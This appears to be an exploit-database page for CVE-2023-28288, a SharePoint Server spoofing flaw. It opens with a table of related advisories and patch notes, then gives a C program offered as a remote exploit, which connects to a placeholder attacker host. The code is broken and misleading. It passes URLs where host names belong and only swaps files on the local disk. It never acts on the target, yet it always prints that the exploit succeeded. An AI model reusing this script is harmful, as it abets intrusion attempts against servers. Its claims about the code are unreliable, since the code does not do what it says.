| Title | Published | Views | Family |
|---|---|---|---|
| Microsoft SharePoint Enterprise Server 2016 - Spoofing Exploit | 26 Jun 2023 00:00 | – | zdt |
| Microsoft SharePoint Security Vulnerability | 11 Apr 2023 00:00 | – | cnnvd |
| Microsoft SharePoint Server Spoofing Vulnerability (CNVD-2023-72199) | 13 Apr 2023 00:00 | – | cnvd |
| CVE-2023-28288 | 11 Apr 2023 19:13 | – | cve |
| CVE-2023-28288 Microsoft SharePoint Server Spoofing Vulnerability | 11 Apr 2023 19:13 | – | cvelist |
| EUVD-2023-31995 | 3 Oct 2025 20:07 | – | euvd |
| Description of the security update for SharePoint Server 2019: April 11, 2023 (KB5002373) | 11 Apr 2023 07:00 | – | mskb |
| Description of the security update for SharePoint Server Subscription Edition: April 11, 2023 (KB5002375) | 11 Apr 2023 07:00 | – | mskb |
| April 11, 2023, cumulative update for SharePoint Enterprise Server 2013 (KB5002381) | 11 Apr 2023 07:00 | – | mskb |
| Description of the security update for SharePoint Foundation 2013: April 11, 2023 (KB5002383) | 11 Apr 2023 07:00 | – | mskb |

```c
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288
#include <windows.h>
#include <wininet.h>   // InternetOpen, InternetConnect, HttpOpenRequest, ... (link with wininet.lib)
#include <stdio.h>
#include <string.h>    // strlen

// Declared here because main() calls it before its definition
BOOL InternetReadFileUrl(const char *url, HANDLE file);

// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";
// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";
// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";
// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

int main()
{
    HANDLE file;
    DWORD bytes_written;
    char file_contents[1024];

    // Create the fake file contents
    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");

    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating fake file: %lu\n", GetLastError());
        return 1;
    }
    if (!WriteFile(file, file_contents, (DWORD)strlen(file_contents), &bytes_written, NULL))
    {
        printf("Error writing fake file: %lu\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Send a request to the vulnerable SharePoint server to download the file
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating vulnerable file: %lu\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file))
    {
        printf("Error downloading vulnerable file: %lu\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Replace the vulnerable file with the fake file
    if (!DeleteFile(file_name))
    {
        printf("Error deleting vulnerable file: %lu\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name))
    {
        printf("Error replacing vulnerable file: %lu\n", GetLastError());
        return 1;
    }

    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL))
    {
        printf("Error triggering vulnerability: %lu\n", GetLastError());
        return 1;
    }

    // Print a message indicating that the vulnerability has been exploited
    printf("Vulnerability exploited successfully.\n");
    return 0;
}

BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    DWORD bytes_written;   // separate counter so WriteFile does not overwrite bytes_read
    char buffer[1024];

    // Open an Internet connection
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL)
    {
        return FALSE;
    }

    // Connect to the server
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL)
    {
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL)
    {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Read the response data
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
    {
        if (file != NULL)
        {
            // Write the data to disk
            if (!WriteFile(file, buffer, bytes_read, &bytes_written, NULL))
            {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
}
```